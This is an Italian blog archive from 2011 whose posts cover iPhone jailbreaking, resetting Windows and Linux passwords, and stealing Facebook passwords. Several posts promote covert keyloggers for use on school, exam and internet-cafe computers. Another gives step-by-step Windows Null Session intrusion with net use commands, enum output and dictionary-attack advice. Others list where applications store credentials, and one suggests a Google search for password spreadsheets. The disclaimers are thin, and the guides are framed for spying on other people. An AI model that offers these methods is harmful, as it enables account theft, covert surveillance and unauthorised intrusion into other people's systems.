martedì 13 dicembre 2011

Jailbreak iOS 5.0.1




Nota importante: il jailbreak funzionerà soltanto sull’iPhone 4 e sull’iPhone 3GS. L’iPhone 4S e l’iPad sono più difficili da sbloccare a causa del chipset A5, ma il jailbreak su questi dispositivi è imminente. Questa guida è rivolta agli utenti Windows. Gli utenti Mac possono scaricare qui il software di jailbreak appropriato (eseguendo le stesse procedure elencate qui). PCrevenge non perdona l’uso di software ottenuto illegalmente. Tutti i lettori che seguono le procedure indicate qui sotto lo fanno a proprio rischio di perdita dati o che il proprio iPhone possa rimanere danneggiato o bloccato a causa di un processo di jailbreak incorretto o di altri fattori. Sei stato avvisato. Non farlo a meno che tu non sappia cosa stai facendo, e accetta il rischio che ti stai prendendo.

  • Scarica RedSn0w 0.9.9b8 e installalo sul tuo computer.
  • Poi, prendi iOS 5 IPSW (il software iPhone) sia per l’iPhone 4 che per l’iPhone 3GS. Quest’ultimo verrà usato per creare una versione hackerata del firmware di iOS.  RedSn0W, lo strano nome del software non funzionerà sul firmware di iOS 5.0.1, quindi dovrete necessariamente usare quello di iOS 5.
  • Prima di collegare il tuo iPhone al computer per il processo di jailbreak, assicurati che sia spento. Una volta che il tuo telefono è spento e connesso (chiudi iTunes se prova ad aprirsi), fai partire RedSn0w.
  • Ci sono due opzioni disponibili sulla pagina principale di RedSn0w. Per i nostri propositi dovrete cliccare su “extras”.
  • Clicca “Select IPSW” e scegli il corrispondente firmware, a seconda di quale telefono possiedi. Una volta che è stato caricato sul tuo sistema, tornerai indietro alla schermata principale.
  • Ora puoi cliccare su “Jailbreak“. Per i jailbreakers principianti, questo è un momento di panico ma niente paura per i riavvii continui e gli schermi neri del telefono, andrà tutto bene. Si spera.
  • Di nuovo, Redsn0w vi chiederà di spegnere il vostro telefono prima di connetterlo. Fare il jailbreak untethered di un iPhone significa metterlo nella modalità DFU (Device Firmware Update, ovvero aggiornamento del firmware del dispositivo).
  • RedSn0w vi “accompagnerà” attraverso i passaggi del DFU. Saprai se hai avuto successo se lo schermo dell’iPhone diventerà nero e mostrerà delle linee molto leggere verticali rivolte verso il basso.
  • Il firmware di iOS5 è hackerato da  RedSn0w e caricato nel tuo telefono nella modalità DFU. Durante gli stadi di riavvio, dovresti non dovresti toccare il telefono. Se vedi un immagine di un cavo iPhone che si collega con iTunes tramite cavo, devi far ripartire il processo DFU.
  • Intanto che la versione hackerata di iOS5 si carica, rilassati e goditi il tempo di attesa che va dai 3 ai 5 minuti. Il tuo iPhone si riavvierà un po’ di volte,  lo schermo diventerà nero ed eventualmente, del codice comincerà a scorrere sul tuo dispositivo. Questo è il segnale di un processo di jailbreak andato a buon fine.
  • Quando il tuo telefono torna stabile, seleziona “just boot” dagli “extras” di RedSn0w per completare il processo. Questo è ciò che è conosciuto (viene accennato nell’articolo) come avvio tethered a causa della natura intrinseca di iOS5, ogni volta che dovrai riavviare il tuo dispositivo nel futuro, l’avvio tethered con RedSn0w dovrà essere necessariamente usato.
  • Se è andato tutto bene, l’icona marrone di Cydia apparirà gloriosamente sul vostro iPhone. Se l’icona è bianca, significa che non hai effettuato il riavvio tethered.
In futuro, versioni aggiornate di RedSn0w potrebbero rimuovere la necessità di un avvio tethered, optando piuttosto per un untethered, ma per ora questa è l’unica opzione per gli utenti di iOS 5 semi stabile. Untethered significa che l’avvio può essere effettuato senza collegare il telefono al pc ed eseguendo un avvio tethered. L’unica opzioneuntethered è ancora in versione alpha e le istruzioni per la sua installazione possono essere trovate qui.
Con Cydia finalmente installata sul vostro iPhone, il percorso per la grandezza vi si rivela.  Cydia è il principale deposito per tutti gli affari di Jailbreak e da qui, il tuo telefono può diventare quello che hai sempre desiderato che fosse. Infila più icone sulle schermate, personalizza il pulsante home, esplora i file system dell’iPhone e molto, molto altro. Con il jailbreak, il tuo telefono diventa il dispositivo che avrebbe da sempre dovuto essere.

sabato 10 dicembre 2011

Windows password hacking

safe laptop

GUIDA Recuperare la Password di Windows XP e Vista, perduta.
Questo post ha solo scopo illustrativo, utilizzare queste tecniche su Pc altrui consiste in un reato di violazione della Privacy. Il seguente sistema funziona sui sistemi operativi Microsoft Windows Xp e Vista con i relativi service pack.
Come primo passo, scarichiamo da qui il seguente file:
http://home.eunet.no/~pnordahl/ntpasswd/
Si tratta del programma open source bootante “Offline NT password & Registry Recover” che permette di recuperare la password di sistema senza avere alcun accesso agli account. Una volta scaricato il file (in formato .iso), masterizziamolo su un CD, inseriamolo nel supporto ottico e riavviamo il sistema.
Il CD si avvierà automaticamente facendo partire il programma in esso contenuto, il cui cuore è basato su Linux. La scheramata principale sarà quella di una comune shell.


Passo 1
Una volta che tutto sarà pronto, vi verrà chiesto di selezionare la partizione che contiene l’installazione di Windows: solitamente l’automatismo impiegato rileva il tutto correttamente, e sarà sufficiente premere Invio.
Se così non fosse, premete il numero associato alla partizione corretta dalla tabellina in alto, e quindi invio.
Passo 2
Il programma riconosce quasi tutti i filesystem quindi a questo punto premete tranquillamente Invio, non preoccupatevi di eventuali segnali di errore.
Passo 3
Ora vi chiede in quale directory è situato il file che contiene la password, a meno che non l’abbiate modificato manualmente voi, allora premete Invio.
Passo 4
Il registro di sistema è diviso su più file: il programma vi chiede quali parti volete caricare. Premete
invio per specificare quelle di default, in cui è contenuta la password.
Passo 5
Il programma permette di effettuare anche altre operazioni legate alla modifica del registro di configurazione, ma scegliamo 1 per il recupero.
Passo 6
Vi verrà proposta una lista di tutti gli utenti presenti sul sistema: digitate il nome dell’utente per cui volete recuperare la password, facendo la massima attenzione a rispettare le maiuscole-minuscole. In questo caso ho digitato Zane per recuperare la mia password.
Passo 7
Dopo una serie di informazioni sul profilo che avete scelto, vi verrà chiesto di inserire una nuova
password: fino a qui abbiamo fatto intendere, per semplicità di esposizione, che fosse possibile “recuperare” la password: questo in realtà non è possibile utilizzando Offline NT Password & Registry Recover.
Il nostro programma permette però di cancellare la vecchia password dimenticata e sostituirla con una nuova: per agire nel metodo più sicuro possibile, digitate * (asterisco): per farlo, premete Shift + 8 (il programma “pensa” in americano). Questo eliminerà la password smarrita, consentendo l’accesso senza parola d’ordine.
Il tool chiederà quindi la prima di molte conferme: rispondiamo y
Passo 8
Se la linea sottostante riporta Changed!…siamo a posto, l’operazione è (virtualmente) riuscita!! Nei prossimi passaggi la finalizzeremo.
Passo 9
Digitiamo ora ! (ottenibile con Shift + 1 )
Passo 10
Siamo di nuovo al menu principale, ora q

Passo 11
Ci viene proposto un rapporto di quello che è stato modificato: accertatevi che vi sia solo
# hive
0 OK
se così non fosse, avete premuto qualche pulsante di troppo, premete il tasto “reset” sul computer e ricominciate da capo.

Passo 12
Ultimo passaggio: tutte le operazioni svolte fino ad ora sono solo “virtuali”: digitando y diventeranno effettive!

Passo 13
Il programma lavorerà qualche istante, mostrando una schermata simile alla sottostante: come potete notare sono presenti anche alcune righe di errore, che possono tranquillamente essere ignorate.
Molto bene, l’operazione è conclusa, ora potete verificare come è andata: incrociate le dita, estraete il CD-ROM e premete ctrl+alt+canc per riavviare il sistema.

Passo 14
Entro pochi istanti dovremmo trovarci davanti alla schermata di verifica integrità del disco: è tutto normale.
Conclusa la verifica, vi verrà proposta l’abituale schermo di benvenuto di Windows XP:
digitiamo/scegliamo il nostro utente, e lasciamo vuoto il campo password.
Alternativa:
Se non dovessimo riuscire una valida alternativa è quella di Ophcrack.
Ophcrack è un live CD anche questo basato su Linux che permette di scovare la password in Brute force.
Inserendo Il CD nel supporto ottico, esso si avvierà iniziando le operazioni di ricerca della password. E’ disponibile per Windows e Linux, è un progetto open source quindi è possibile esaminare il codice sorgente.
Funziona garantito per il 99% dei casi con password alfanumeriche.

Arrivederci al prossimo articolo

Michele Balzano

venerdì 9 dicembre 2011

Facebook password bingo



Ottenere l'accesso a Facebook login e la password in un attimo! Facebook password Extractor rivela le password memorizzate nella cache di Facebook in tutti i browser Web più diffusi in un solo click. Recupera le password di più account di Facebook dalle più recenti versioni di Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera e Google Chrome. Tutti i browser sono supportati.
Ottenere le password di tutti gli utenti del computer non è mai stato così semplice.
Il software è scaricabile gratuitamente dal sito del produttore :
http://www.elcomsoft.com/download/fpe_setup_en.msi

per approfondire : 
http://balzanomichele.blogspot.com/2010/09/dove-memorizza-windows-le-password.html#axzz1g1gz8UQS

http://balzanomichele.blogspot.com/2011/09/trovare-le-password-perdute.html#axzz1g1gz8UQS


Arrivederci al prossimo articolo
Michele Balzano

Rubare la password di Facebook



Esistono solo due modi per sapere la password di Facebook:
1°) Farsela dire dal proprietario dell’account.
Magari facendo un po' di social engineering
2°) Registrarla mentre viene digitata dalla tastiera.
In questo post mi occuperò del secondo metodo. Per questo scopo ho provato un software :
Fbrecpwd Software KeyLogger, si tratta di uno strumento invisibile di sorveglianza e registrazione di tutti i tasti premuti, un software spia che registra ogni attività sul tuo pc  Il Keylogger ti permette di tracciare segretamente tutte le attività di tutti gli utenti del computer, quindi registra anche tutte le password digitate.
Fino a qualche tempo fà il nome Keylogger era associato a elementi dannosi per il computer, questi software infatti avevano solo la funzione di intercettare le combinazioni di tasti digitati e lo scopo di chi li usava era solo per il furto di informazioni. Oggi le cose sono completamente cambiate - non solo il numero di funzioni eseguite da questi software di monitoraggio è aumentato, ma lo scopo di chi utilizza questo tipo di software è cambiato. Ora è più utilizzato dai datori di lavoro e dai genitori, per essere più consapevoli di come vengono utilizzati i computer in loro assenza. Software come Fbrecpwd Software Keylogger è utilizzato da molti genitori per verificare le attività dei propri figli su internet.
Vi ricordo l’utilizzo di un software come Fbrecpwd Software Keylogger è illegale se usato per registrare password di account che non ci appartengono!!
Arrivederci al prossimo post
Michele Balzano

lunedì 5 dicembre 2011

Dove vengono memorizzati i Backup dell'iPhone?

iphone_4S1

Come sapete iTunes consente di creare il backup delle impostazioni e di altre informazioni memorizzate sull'iPhone e sull'iPod touch. È possibile impostare il software affinchè la sincronizzazione ed il backup siano effettuati automaticamente. Il backup è essenziale per effettuare un ripristino del dispositivo oppure per trasferire dati su un altro dispositivo. Ma dove vengono memorizzati i backup?
La cartella in cui vengono archiviati i backup varia a seconda del sistema operativo del computer. Poiché iTunes memorizza solo un backup per ciascun dispositivo, è importante assicurarsi che la cartella dei backup sia inclusa nella propria procedura di backup dei dati su hard disk esterno.

Gli archivi di backup vengono memorizzati da iTunes nei seguenti percorsi:

Sui computer Mac:
~/Library/Application Support/MobileSync/Backup/

Sui computer con sistema operativo Windows XP:
C:\Documents and Settings\(nomeutente)\Application Data\Apple Computer\MobileSync\Backup\

Sui computer con sistema operativo Windows Vista:
C:\Users\(nomeutente)\AppData\Roaming\Apple Computer\MobileSync\Backup\

Sui computer con sistema operativo Windows SEVEN:
C:\Users\(nomeutente)\AppData\Roaming\Apple Computer\MobileSync\Backup\

Arrivederci al prossimo articolo

Michele Balzano

mercoledì 30 novembre 2011

Intrusione informatica è semplice con una null session!

jockerLa Null Session è una sessione che permette di interagire con un sistema Windows senza dover effettuare l’autenticazione. Tramite la Null Session è possibile ottenere informazioni sul sistema, come l’elenco delle condivisioni e l’elenco degli utenti.

Ottenere l’elenco delle condivisioni può permettere un’intrusione semplice. Le condivisioni potrebbero non essere protette da password, nel qual caso si potrebbe accedere a informazioni importanti. Potrebbero anche esserci condivisioni attivate alla scrittura, eventualità che permetterebbe all’hacker di infiltrare un trojan nella cartella dell’esecuzione automatica.

Con l’elenco degli utenti si potrebbe tentare un attacco a dizionario, testando una lista di password contro ogni utente valido.

Infine le informazioni potrebbero essere utilizzate come leva per ottenere la fiducia di un impiegato in un attacco di social-engineering.

Creare la Null Session

Se provassimo a visualizzare le risorse di un computer senza effettuare una Null Session otterremmo un errore di accesso negato:

net view \\127.0.0.1

Per creare una Null Session bisogna utilizzare il comando net use, specificare l’indirizzo del computer, invocare la risorsa IPC$ e fornire credenziali nulle:

C:\Documents and Settings\angelor>net use \\127.0.0.1\IPC$ "" /u:""

Se il computer remoto accetta la Null Session, otterremo questo messaggio eseguendo net use senza parametri:

C:\Documents and Settings\angelor>net use
Stato       Locale     Remota                    Rete
-------------------------------------------------------------------------------
OK                     \\127.0.0.1\IPC$          Rete di Microsoft Windows
Esecuzione comando riuscita.

A questo punto net view visualizzerà l’eventuale lista di risorse (non quelle nascoste però).

Sfruttare la Null Session

Per facilitare l’interazione con la Null Session sono stati creati diversi tools. Alcuni tra questi sono enum, winfo e hunt. Con questi strumenti è possibile ottenere liste di utenti, risorse condivise (anche nascoste) e altre informazioni (come le policy delle password o la versione del sistema operativo) tramite Null Session. Vediamo nel dettaglio.

Sia hunt che winfo sono molto semplici da usare: bisogna invocare il comando da linea di comando specificando l’indirizzo Ip (nel formato preceduto da \\ se si utilizza hunt). Winfo permette di specificare se creare una Null Session prima di tentare il recupero delle informazioni.

Uno strumento a mio parere più potente è enum. Oltre ad avere più opzioni rispetto agli altri due, conesente anche un attacco a dizionario.

Ecco la lista delle opzioni di enum:

usage:  enum  [switches]  [hostname|ip]
-U:  get userlist
-M:  get machine list
-N:  get namelist dump (different from -U|-M)
-S:  get sharelist
-P:  get password policy information
-G:  get group and member list
-L:  get LSA policy information
-D:  dictionary crack, needs -u and -f
-d:  be detailed, applies to -U and -S
-c:  don't cancel sessions
-u:  specify username to use (default "")
-p:  specify password to use (default "")
-f:  specify dictfile to use (wants -D)

e un esempio con obiettivo Windows XP:

enum  -UMNSPGL 192.168.132.128
server: 192.168.132.128
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: TEST
domain: WORKGROUP
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting namelist (pass 1)... got 4, 0 left:
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
getting user list (pass 1, index 0)... success, got 4.
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
enumerating shares (pass 1)... got 3 shares, 0 left:
IPC$  ADMIN$  C$
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
TEST\Administrator
Group: Backup Operators
Group: Guests
TEST\Guest
Group: Network Configuration Operators
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: Utenti desktop remoto
Group: HelpServicesGroup
TEST\SUPPORT_328945a3
cleaning up... success.

In questo esempio riusciamo ad ottenere la lista delle condivisioni (tutte nascoste in questo caso): IPC$,ADMIN$ e C$ e una lista di utenti, ovvero Administrator,Guest,HelpAssistant e SUPPORT_328945a3.

Utilizzando l’opzione D (dictionary crack, con -u per specificare l’utente e -f per specificare il dizionrio da usare) è possibile ottenere l’accesso e quindi “montare” in locale il disco C$ della macchina da attaccare:

net use H: \\192.168.132.128\C$

Per chi fosse alla ricerca di dizionari da utilizzare in attacchi di questo tipo consiglio questo indirizzo: http://packetstormsecurity.org/Crackers/wordlists/

Come Difendersi

I sistemi operativi Microsoft attualmente diffusi per default non mostrano la lista degli utenti. Per controllare, attivare o disabilitare la Null Session su Xp e Window 2003 è possibile utilizzare l’interfaccia grafica secpol.msc, da invocare da Start -> Esegui (o tasto Windows + R).

Le voci interessate sono le seguenti:

Criteri Local -> Opzioni di protezione

Accesso di rete: non consentire l’enumerazione anonima degli account SAM
Accesso di rete: non consentire l’enumerazione anonima di account e condivisioni SAM

Attivando entrambe le voci gli utenti anonimi (ovvero con credenziali nulle) non saranno in grado di elencare gli utenti e neppure la lista delle risorse condivise, riducendo notevolmente la superficie di attacco per un pirata.

Le porte Tcp/Udp coinvolte in questo attacco sono le seguenti: 135,137,138,139,445. Filtrarle con un personal firewall, perlomeno sull’interfaccia esposta a Internet può mitigare il pericolo e neutralizzare questo tipo d’attacco.

L’attacco Null Session è sicuramente uno dei più antichi attacchi per Windows, nel passato ha fatto molte vittime. Le policy di sicurezza standard delle ultime versioni di Windows (da XP Professional a Vista, Windows 2003 compreso) rendono questo attacco meno diffuso. Ma non è detto che non si trovino configurazioni deboli.                                fonte: http://www.pillolhacking.net

Arrivederci al prossimo articolo

Michele Balzano  

lunedì 28 novembre 2011

Le 25 password più popolari del 2011

pigrizia_mentale

Collettivamente sembra che noi esseri umani in fatto di fantasia siamo molto pigri. Basta dare un'occhiata a come molte password d'accesso siano facili da indovinare.

A dimostrazione di questa mia affermazione di seguito allego le 25 password più usate del 2011.

Il risultato non è molto diverso degli anni precedenti e il che non dovrebbe davvero essere una sorpresa, vero?

Le classifiche sono state create da SplashData che ha realizzato la statistica sui dati provenienti da milioni di password rubate e pubblicate online dagli hacker nel 2011.

ed ecco il risultato che mostra quanto siamo pigri quando scegliamo una password:

1.  password
2.  123456
3.  12345678
4.  qwerty
5.  abc123
6.  monkey
7.  1234567
8.  letmein
9.  trustno1
10. dragon
11. baseball
12. 111111
13. iloveyou
14. master
15. sunshine
16. ashley
17. bailey
18. passw0rd
19. shadow
20. 123123
21. 654321
22. superman
23. qazwsx
24. michael
25. football

Sperando che serva a mettervi in guardia e a spronarvi ad essere più fantasiosi nella creazione di una password. (come scegliere una password resistente)

Arrivederci al prossimo articolo

Michele Balzano

venerdì 25 novembre 2011

Eliminare la password dimenticata di Outlook Express


Nel caso in cui abbiate dimenticato la password per accedere ad Outlook Express potete eliminarla con un semplice intervento all'interno del Registro di sistema di Windows.

Avviate l'Editor del Registro di sistema (Avvio/Start , Esegui..., REGEDIT) quindi selezionate la voce "Trova" dal menù "Modifica" quindi inserite, all'interno del campo di ricerca, la seguente chiave:
89c39569-6841-11d2-9f59-0000f8085266

Provvedete quindi a cancellare solo ed esclusivamente le sue sottochiavi.

Aprite nuovamente Outlook Express e specificate una nuova password per l'accesso.

Tenete presente che la sottochiave "name" e la "user id" sono la stessa cosa.

Se siete a conoscenza della user id portatevi in corrispondenza della chiave seguente:
HKEY_CURRENT_USER\Identities, in modo da reperire il nome della chiave contenente la password di Outlook Express"



Arrivederci al prossimo articolo
Michele Balzano

Il mio sistema è in Crash!

Fantastica!!

Root Password Recovery – Recuperare la Password di root


Se hai perso la password di root, non disperarti, e facile cambiarla  Il trucco sta nel passare una opzione single al kernel durante il boot.

Se usi Grub: 
1)  Seleziona il tuo linux nel menu grafico di grub e premi e
2)  Scegli l'immagine del kernel e ripremi e.
3)  Aggiungi la parola single alla fine, premi invio, premi b  premi invio.
4)  Passo successivo:       passwd root
     Segui il video per cambiare la password.
5)  Successivamente, fai  sync; reboot
Questo è tutto! La modalita' Single user è di aiuto se vuoi fare manutenzione al sistema senza tutti i
servizi avviati, corrisponde alla modalita' provvisoria di Windows.

Se invece usi Lilo:
1)  Avvia la macchina, al prompt di LILO digita:
      linux single
2)  Passo successivo: passwd root
Segui il video per cambiare la password.
3)  Successivamente:  sync; reboot

Traduzione: Vito Russo
Guida pubblicata su http://linux.le.it

venerdì 18 novembre 2011

Dove sono memorizzate le password di Windows



Molte persone mi chiedono informazioni relativamente a come windows conserva le password delle più diffuse applicazioni.
In questo post cercherò di dare una risposta indicandovi la posizione nel Registro di sistema o del file di  in cui le applicazioni Windows memorizzano le password.
Così ho preparato un elenco di percorsi di memorizzazione delle password per le applicazioni e componenti di Windows più popolari.
Siate consapevoli che, anche se si conosce la posizione delle password salvate, questo non significa che siano leggibili in chiaro, infatti per lo più sono crittografate con sistemi propetari in più non è possibile copiarle da un computer ad un altro. Molte applicazioni memorizzano le password in modo tale da impedire il loro trasferimento ad un altro computer o ad un'altro profilo utente. Tuttavia, è possibile utilizzare queste informazioni per rimuovere i password salvate nel sistema.

Elenco applicazioni e percorsi:

  • Windows password di rete (XP/Vista/2003): Quando ci si connette al file system di un altro computer della rete (qualcosa come \ \ MyComp\ MyFolder), Windows vi permette di salvare la password. Se si sceglie di salvare la password, la password cifrata viene memorizzata in un file di credenziali. Il file viene memorizzato nella credenziale seguenti posizioni:
  • Windows XP/2003: %USERPROFILE%\Impostazioni locali\Dati applicazioni\Microsoft\Credentials\[User   SID]\Credentials 
  • Windows Vista:  %USERPROFILE%\Impostazioni locali\Dati applicazioni\Roaming\Microsoft\Credentials
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Internet Explorer 4,00-6,00: Le password sono memorizzate in un percorso segreto nel Registro di sistema conosciuto come "Protected Storage". La chiave di base del Protected Storage si trova sotto la seguente chiave: "HKEY_CURRENT_USER \ Software \ Microsoft \ Protected Storage System Provider ". Per visualizzare le sottochiavi di questa chiave in RegEdit, è necessario loggarsi come utente SYSTEM. (guarda qui come fare) non sarà possibile comunque guardare la password in chiaro perché cifrata. Inoltre, questa chiave non può facilmente essere trasportata da un computer all'altro, come si fa per tutte le chiavi regolari.
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Internet Explorer 7,00-8,00: Le nuove versioni di Internet Explorer memorizzano le password in 2 sedi diverse. Le password del completamento  automatico vengono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. Le password di autenticazione HTTP sono memorizzate nel file delle credenziali in %USERPROFILE%\Dati applicazioni\Microsoft\Credenziali, insieme con le password di login del computer della LAN ed altre password.
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Firefox: le password vengono memorizzate in uno dei seguenti file: signons.txt, signons2.txt e signons3.txt (dipende dalla versione di Firefox) Questi file password si trovano all'interno della cartella del profilo di Firefox, in [Windows profilo] \ Application Data \ Mozilla \ Firefox \ Profiles \ Nome Profilo, inoltre, key3.db, che si trova nella stessa cartella, viene utilizzata per la cifratura / Descrizione delle password.
  • Google Chrome browser Web: Le password vengono memorizzate in %USERPROFILE%\Impostazioni locali\Dati applicazioni\Google\Chrome\User Data\Default\Web Data (questo è il nome del file database SQLite che contiene le password criptate e altre cose)
  • Opera: Le password sono memorizzate in file wand.dat, che si trova sotto %USERPROFILE%\Impostazioni locali\Dati applicazioni\Google\Chrome\User Data\Default\Web Data\Opera\Opera profilo
  • Outlook Express (tutte le versioni): Le password POP3/SMTP/IMAP Outlook Express sono memorizzate anche nella Protected Storage, come le password di vecchie versioni di Internet Explorer.
  • Outlook 98/2000: Le vecchie versioni di Outlook memorizzano le password POP3/SMTP/IMAP in Protected Storage, come le password di vecchie versioni di Internet Explorer.
  • Outlook 2002-2008: tutte le nuove versioni memorizzano le password di Outlook nella stessa chiave del Registro di sistema delle impostazioni dell'account. Gli account sono memorizzati nel Registro di sistema in HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index] Se si utilizza Outlook per la connessione di un account sul server di Exchange, la password viene memorizzata nel file delle Credenziali, insieme con le password di login del computer della LAN.
 È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password di Outlook 2002-2008.
  • Windows Live Mail: Tutte le impostazioni dell'account, comprese le password criptate, sono memorizzati in %USERPROFILE%\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live\ [Nome account Mail] Il nome del account è un file XML.
 È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password di  Windows Live Mail.
  • Thunderbird: Il file di password si trova sotto %USERPROFILE%\Impostazioni locali\Dati applicazioni\ Thunderbird \ [Nome profilo] Si dovrebbe cercare un nome di file con estensione. s.
  • Google Talk: Tutte le impostazioni dell'account, comprese le password criptate, sono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
  • Google Desktop: password di e-mail sono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]

  • MSN / Windows Messenger versione 6.x : Le password vengono memorizzate in una delle seguenti posizioni:
  1. Chiave di registro: HKEY_CURRENT_USER Software \ Microsoft \ MSNMessenger
  2. Chiave di registro: HKEY_CURRENT_USER Software \ Microsoft \ MessengerService
  3. Nelle credenziali di file, con voce denominata come "* Passport.Net \ \". (Solo quando il sistema operativo è XP o superiore)
  • MSN Messenger versione 7.x: Le password vengono memorizzate in HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
  • Windows Live Messenger versione 8.x/9.x: Le password vengono memorizzate nel file delle credenziali, con nome di voce inizia con "WindowsLive: name =". 
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.

  • Yahoo Messenger 6.x: La password viene memorizzata nel Registro di sistema in HKEY_CURRENT_USER \ Software \ Yahoo \ Pager ("valore EOptions stringa")
  • Yahoo Messenger 7.5 o versione successiva: La password viene memorizzata nel Registro di sistema in HKEY_CURRENT_USER \ Software \ Yahoo \ Pager - "ETS" valore. Il valore memorizzato in "valore ETS" non possono essere recuperati.
  • AIM Pro: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ AIM \ AIMPRO account \ [Nome]
  • AIM 6.x: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ America Online \ AIM6 password \
  • ICQ Lite 4.x/5.x/2003: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ NewOwners \ [ICQ] (valore MainLocation)
  • ICQ 6.x: l'hash della password viene memorizzata in %USERPROFILE%\Impostazioni locali\Dati applicazioni\ICQ\ nome utente\Owner.mdb (Access Database) (l'hash della password non può essere recuperato)
  • Digsby: La password principale di Digsby è archiviato in %USERPROFILE%\Impostazioni locali\Dati applicazioni\ Digsby\ digsby.dat tutte le altre password vengono memorizzate nei server Digsby.
  • PaltalkScene: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ Paltalk [account] \ Nome.
Con questo tutorial ho cercato di scendere un pò nei meandri segreti di Windows, per tutti quelli che vogliono approfondire di seguito un link ad un articolo che riassume il mio Libro "Password No Problem"
Arrivederci al prossimo articolo
Michele Balzano


giovedì 10 novembre 2011

Keylogger su usb gratis!

UsbRecKey è il più piccolo e il più efficace software keylogger da usare su pen drive USB. Il software è leggero e compatibile con qualsiasi sistema Windows. Registra automaticamente nella penn drive USB un file log con l'elenco di tutte le applicazioni in uso sul computer ed il testo digitato all'interno di tali applicazioni (conversazioni di chat, mail, documenti, nomi utente, password, etc) (Registratore di Tasti).
Registra le navigazioni effettuate con tutti i più comuni browser e salva le schermate del desktop ogni 30 secondi, ma è possibile scegliere un intervallo di tempo a piacere.
Il software è ideale per chi ha necessità di monitorare computer per un determinato lasso di tempo e di non lasciare alcuna traccia sul computer dopo il periodo di monitoraggio.
Un esempio può essere :
  • Aule Universitarie
  • Computer Scuola Guida (quelli usati per gli esami)
  • Internet Cafè
  • Aule Informatiche
Il software è completamente gratuito e non è necessaria la registrazione per il download. Per l'installazione è necessario indicare il percorso della pen drive USB (di almeno un 1 Gb) al resto penserà il software.

Per l'utilizzo invece bastarà inserire la pen drive in un computer con Windows XP / Seven / Vista o Windows Server, lanciare dalla pen drive il file UsbRecKey. Nella pagina principale del software impostiamo la frequenza di acquisizione dei print screen, poi premiamo Shift+F9 per nasconderlo e lasciarlo attivo in memoria.
Per leggere il file contenente tutte le registrazioni basterà andare nella pen drive USB e aprire il file di testo con la data che ci interessa, per esempio quello di oggi alle ore 16:21:20 sarà "log_11-16-11_16-21-20.txt"
Per vedere i print screen dello schermo basterà andare nella cartella SnapShots della pen drive.
 
Finestra principale di UsbRecKey - Software Keylogger su usb
 
Il software è gratuito ed è possibile prelevarlo da qui
Arrivederci al prossimo Articolo
OcchiolinoMichele Balzano

 

lunedì 7 novembre 2011

Trovare file e documenti riservati nel Deep Web.

 

powerpoint-256x256excel-iconmicrosoft-word-logoimage20[1]

Come trovare file Pdf, Word, Excel, PPS ecc, col motore di ricerca di Google

Per poter, ricercare files: pdf, word, excel, powerpoint, ecc; basta inserire nella barra di navigazione di Google, prima del nome del documento che stiamo cercando, queste stringhe:

filetype:pdf  (per cercare file PDF)

filetype:doc  (per cercare file Word)

filetype:ppt  (per cercare file Power Point)

filetype:xls   (per file Excel)

Ad esempio :

Vorrei cercare manuali d’uso di Windows XP in formato Word

Quindi scrivo nel campo delle ricerche di Google: filetype:doc Manuale Windows XP

image

come vedete per magia il primo risultato è un bellissimo documento Word contenente un ottimo manuale di Windows XP in italiano!!

Lo stesso tipo di ricerche possono essere effettuate, ovviamente, variando il nome del soggetto, ossia del file che c'interessa. Quindi, se al posto di "Manuale di Windows XP", per esempio stiamo cercando un libro, o una poesia, inseriremo il nome adeguato. Vedi: "I Promessi Sposi"; o "Alessandro Manzoni", ecc ecc. Se poi intendiamo ricercare qualcosa di più riservato dobbiamo solo affidarci alla nostra fantasia …magari un

“filetype:xls lista password utenti”

potrebbe darci risultati del tutto inaspettati e sorprendenti… Occhiolino

Arrivederci al prossimo articolo

Michele Balzano

giovedì 6 ottobre 2011

Steave Jobs the world is not ready

 
Steve Jobs 
1955 - 2011
The world is not ready for your absence

mercoledì 5 ottobre 2011

comma 29 del Disegno di Legge per le intercettazioni.

Wikipedia oggi si presenta così: 


 in queste ore Wikipedia in lingua italiana rischia di non poter più continuare a fornire quel servizio che nel corso degli anni ti è stato utile [...] La pagina che volevi leggere esiste ed è solo nascosta, ma c’è il rischio che fra poco si sia costretti a cancellarla davvero”.
